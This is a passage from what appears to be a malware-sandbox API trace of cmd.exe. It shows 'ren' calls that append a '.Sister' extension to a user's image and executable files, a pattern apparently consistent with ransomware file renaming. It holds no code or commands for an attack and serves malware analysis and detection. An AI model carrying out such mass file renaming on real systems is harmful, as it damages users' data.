0x2 [0293.645] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.645] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.646] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed92f1b00*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed92f1b00*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.646] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"lrXVOGLmm_sYY.png.Sister\" \"lrXVOGLmm_sYY.bat\" ") returned 48 [0293.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.646] GetFileType (hFile=0x50) returned 0x2 [0293.646] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.646] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.647] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x30, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x30) returned 1 [0293.648] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0293.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.648] GetFileType (hFile=0x50) returned 0x2 [0293.648] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.648] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0293.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.648] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0293.656] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0293.657] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0293.657] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0293.657] malloc (_Size=0xffce) returned 0x21ed98df9c0 [0293.657] ??_V@YAXPEAX@Z () returned 0x21ed98df9c0 [0293.657] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0293.657] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0293.657] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0293.657] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0293.657] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0293.657] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0293.657] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0293.657] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0293.657] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0293.658] ??_V@YAXPEAX@Z () returned 0x1 [0293.658] GetProcessHeap () returned 0x21ed8c70000 [0293.658] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd0) returned 0x21ed8d6c850 [0293.658] GetProcessHeap () returned 0x21ed8c70000 [0293.658] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c850, Size=0x70) returned 0x21ed8d676b0 [0293.658] GetProcessHeap () returned 0x21ed8c70000 [0293.658] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d676b0) returned 0x70 [0293.658] GetProcessHeap () returned 0x21ed8c70000 [0293.658] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x78) returned 0x21ed8d67db0 [0293.658] GetProcessHeap () returned 0x21ed8c70000 [0293.658] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd0) returned 0x21ed8d6ce70 [0293.658] GetProcessHeap () returned 0x21ed8c70000 [0293.658] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6ce70, Size=0x70) returned 0x21ed8d678b0 [0293.658] GetProcessHeap () returned 0x21ed8c70000 [0293.658] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d678b0) returned 0x70 [0293.658] malloc (_Size=0xffce) returned 0x21ed98df9c0 [0293.659] ??_V@YAXPEAX@Z () returned 0x21ed98df9c0 [0293.660] GetProcessHeap () returned 0x21ed8c70000 [0293.660] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7de0 [0293.660] GetProcessHeap () returned 0x21ed8c70000 [0293.660] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5d4d0 [0293.661] _wcsicmp (_String1="lrXVOGLmm_sYY.png", _String2=".") returned 62 [0293.661] _wcsicmp (_String1="lrXVOGLmm_sYY.png", _String2="..") returned 62 [0293.661] GetFileAttributesW (lpFileName="lrXVOGLmm_sYY.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lrxvoglmm_syy.png")) returned 0x20 [0293.661] GetProcessHeap () returned 0x21ed8c70000 [0293.661] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92f1cd0 [0293.662] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92f1ce0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.662] SetErrorMode (uMode=0x0) returned 0x0 [0293.662] SetErrorMode (uMode=0x1) returned 0x0 [0293.662] GetFullPathNameW (in: lpFileName="lrXVOGLmm_sYY.png", nBufferLength=0x7fe7, lpBuffer=0x21ed98df9c0, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\lrXVOGLmm_sYY.png", lpFilePart=0xa6cf4fd660*="lrXVOGLmm_sYY.png") returned 0x2a [0293.662] SetErrorMode (uMode=0x0) returned 0x1 [0293.662] GetProcessHeap () returned 0x21ed8c70000 [0293.662] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5cff0 [0293.663] _wcsicmp (_String1="lrXVOGLmm_sYY.png", _String2=".") returned 62 [0293.663] _wcsicmp (_String1="lrXVOGLmm_sYY.png", _String2="..") returned 62 [0293.663] GetFileAttributesW (lpFileName="lrXVOGLmm_sYY.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lrxvoglmm_syy.png")) returned 0x20 [0293.663] ??_V@YAXPEAX@Z () returned 0x1 [0293.663] malloc (_Size=0xffce) returned 0x21ed98df9c0 [0293.663] ??_V@YAXPEAX@Z () returned 0x21ed98df9c0 [0293.663] malloc (_Size=0xffce) returned 0x21ed98ef9a0 [0293.663] ??_V@YAXPEAX@Z () returned 0x21ed98ef9a0 [0293.663] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\lrXVOGLmm_sYY.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lrxvoglmm_syy.png")) returned 0x20 [0293.663] malloc (_Size=0xffce) returned 0x21ed98ff980 [0293.663] ??_V@YAXPEAX@Z () returned 0x21ed98ff980 [0293.664] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\lrXVOGLmm_sYY.png", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5d4e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5d4e0) returned 0x21ed8cc76c0 [0293.664] malloc (_Size=0xffce) returned 0x21ed990f960 [0293.664] ??_V@YAXPEAX@Z () returned 0x21ed990f960 [0293.664] ??_V@YAXPEAX@Z () returned 0x1 [0293.664] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\lrXVOGLmm_sYY.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lrxvoglmm_syy.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\lrXVOGLmm_sYY.png.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\lrxvoglmm_syy.png.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0293.665] FindNextFileW (in: hFindFile=0x21ed8cc76c0, lpFindFileData=0x21ed8d5d4e0 | out: lpFindFileData=0x21ed8d5d4e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17cf8d10, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0xbb62ea60, ftLastAccessTime.dwHighDateTime=0x1d5eac0, ftLastWriteTime.dwLowDateTime=0xbb62ea60, ftLastWriteTime.dwHighDateTime=0x1d5eac0, nFileSizeHigh=0x0, nFileSizeLow=0x1770f, dwReserved0=0x0, dwReserved1=0x0, cFileName="lrXVOGLmm_sYY.png", cAlternateFileName="")) returned 0 [0293.667] GetLastError () returned 0x12 [0293.667] FindClose (in: hFindFile=0x21ed8cc76c0 | out: hFindFile=0x21ed8cc76c0) returned 1 [0293.667] ??_V@YAXPEAX@Z () returned 0x1 [0293.667] ??_V@YAXPEAX@Z () returned 0x1 [0293.667] ??_V@YAXPEAX@Z () returned 0x1 [0293.667] ??_V@YAXPEAX@Z () returned 0x1 [0293.667] GetProcessHeap () returned 0x21ed8c70000 [0293.667] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc8200 [0293.667] GetProcessHeap () returned 0x21ed8c70000 [0293.667] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95860, Size=0x16) returned 0x21ed8c959a0 [0293.667] GetProcessHeap () returned 0x21ed8c70000 [0293.667] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c959a0) returned 0x16 [0293.667] GetProcessHeap () returned 0x21ed8c70000 [0293.667] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45e30, Size=0x20) returned 0x21ed8d45d40 [0293.667] GetProcessHeap () returned 0x21ed8c70000 [0293.667] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45d40) returned 0x20 [0293.667] GetProcessHeap () returned 0x21ed8c70000 [0293.667] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6bf00 [0293.668] GetProcessHeap () returned 0x21ed8c70000 [0293.668] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6bf00, Size=0xb2) returned 0x21ed937ce30 [0293.668] GetProcessHeap () returned 0x21ed8c70000 [0293.668] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937ce30) returned 0xb2 [0293.668] GetProcessHeap () returned 0x21ed8c70000 [0293.668] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9301cc0 [0293.668] GetProcessHeap () returned 0x21ed8c70000 [0293.668] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9301cc0, Size=0x30) returned 0x21ed9301cc0 [0293.668] GetProcessHeap () returned 0x21ed8c70000 [0293.668] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9301cc0) returned 0x30 [0293.668] GetProcessHeap () returned 0x21ed8c70000 [0293.669] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9301d00 [0293.669] malloc (_Size=0x1ff9c) returned 0x21ed98df9c0 [0293.669] GetProcessHeap () returned 0x21ed8c70000 [0293.669] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937be70 [0293.669] GetProcessHeap () returned 0x21ed8c70000 [0293.669] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937b570 [0293.669] ??_V@YAXPEAX@Z () returned 0x1 [0293.669] malloc (_Size=0x1ff9c) returned 0x21ed98df9c0 [0293.670] GetProcessHeap () returned 0x21ed8c70000 [0293.670] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937b1b0 [0293.670] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed98df9c0, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0293.670] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7780 [0293.670] FindClose (in: hFindFile=0x21ed8cc7780 | out: hFindFile=0x21ed8cc7780) returned 1 [0293.670] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc79c0 [0293.670] FindClose (in: hFindFile=0x21ed8cc79c0 | out: hFindFile=0x21ed8cc79c0) returned 1 [0293.671] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc7c00 [0293.671] FindClose (in: hFindFile=0x21ed8cc7c00 | out: hFindFile=0x21ed8cc7c00) returned 1 [0293.671] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0293.671] malloc (_Size=0x1ff9c) returned 0x21ed98ff970 [0293.671] ??_V@YAXPEAX@Z () returned 0x21ed98ff970 [0293.671] GetProcessHeap () returned 0x21ed8c70000 [0293.671] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67130 [0293.671] ??_V@YAXPEAX@Z () returned 0x1 [0293.671] ??_V@YAXPEAX@Z () returned 0x1 [0293.672] GetProcessHeap () returned 0x21ed8c70000 [0293.672] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9301d00, Size=0x490) returned 0x21ed9301d00 [0293.672] GetProcessHeap () returned 0x21ed8c70000 [0293.672] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9301d00) returned 0x490 [0293.672] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0293.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.672] GetFileType (hFile=0x50) returned 0x2 [0293.672] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.672] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0293.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.673] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0293.680] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.680] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0293.680] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0293.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.681] GetFileType (hFile=0x50) returned 0x2 [0293.681] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.681] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0293.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.681] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x19) returned 1 [0293.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.682] GetFileType (hFile=0x50) returned 0x2 [0293.682] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.682] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0293.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.683] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9301cd0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9301cd0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0293.683] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0293.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.683] GetFileType (hFile=0x50) returned 0x2 [0293.683] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.683] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0293.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.684] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0293.690] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0293.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.690] GetFileType (hFile=0x50) returned 0x2 [0293.690] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.690] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0293.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.691] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0293.696] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0293.696] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0293.696] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0293.696] malloc (_Size=0xffce) returned 0x21ed98df9c0 [0293.697] ??_V@YAXPEAX@Z () returned 0x21ed98df9c0 [0293.697] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0293.697] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0293.697] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0293.697] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0293.697] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0293.697] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0293.697] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0293.697] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0293.697] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0293.697] ??_V@YAXPEAX@Z () returned 0x1 [0293.697] GetProcessHeap () returned 0x21ed8c70000 [0293.697] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f000 [0293.697] GetProcessHeap () returned 0x21ed8c70000 [0293.697] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f000, Size=0x130) returned 0x21ed8d57e60 [0293.697] GetProcessHeap () returned 0x21ed8c70000 [0293.697] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d57e60) returned 0x130 [0293.697] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.698] malloc (_Size=0xffce) returned 0x21ed98df9c0 [0293.698] ??_V@YAXPEAX@Z () returned 0x21ed98df9c0 [0293.698] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.698] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed98df9c0, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0293.701] ??_V@YAXPEAX@Z () returned 0x1 [0293.701] GetProcessHeap () returned 0x21ed8c70000 [0293.701] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d575a0 [0293.702] GetProcessHeap () returned 0x21ed8c70000 [0293.702] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d600a0 [0293.702] GetProcessHeap () returned 0x21ed8c70000 [0293.702] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d600a0, Size=0x130) returned 0x21ed8d58220 [0293.702] GetProcessHeap () returned 0x21ed8c70000 [0293.702] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d58220) returned 0x130 [0293.702] malloc (_Size=0xffce) returned 0x21ed98df9c0 [0293.702] ??_V@YAXPEAX@Z () returned 0x21ed98df9c0 [0293.702] GetProcessHeap () returned 0x21ed8c70000 [0293.702] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc8260 [0293.702] GetProcessHeap () returned 0x21ed8c70000 [0293.702] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9303300 [0293.702] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0293.702] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0293.702] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.702] GetLastError () returned 0x2 [0293.703] GetProcessHeap () returned 0x21ed8c70000 [0293.703] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93061b0 [0293.703] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93061c0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.703] SetErrorMode (uMode=0x0) returned 0x0 [0293.703] SetErrorMode (uMode=0x1) returned 0x0 [0293.703] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed98df9c0, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0293.703] SetErrorMode (uMode=0x0) returned 0x1 [0293.703] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0293.704] GetProcessHeap () returned 0x21ed8c70000 [0293.704] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9302460 [0293.704] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0293.704] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0293.704] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.704] GetLastError () returned 0x2 [0293.704] ??_V@YAXPEAX@Z () returned 0x1 [0293.704] malloc (_Size=0xffce) returned 0x21ed98df9c0 [0293.704] ??_V@YAXPEAX@Z () returned 0x21ed98df9c0 [0293.704] malloc (_Size=0xffce) returned 0x21ed98ef9a0 [0293.704] ??_V@YAXPEAX@Z () returned 0x21ed98ef9a0 [0293.704] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.704] GetLastError () returned 0x2 [0293.704] _get_osfhandle (_FileHandle=2) returned 0x54 [0293.705] GetFileType (hFile=0x54) returned 0x2 [0293.705] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0293.705] GetConsoleMode (in: hConsoleHandle=0x54, 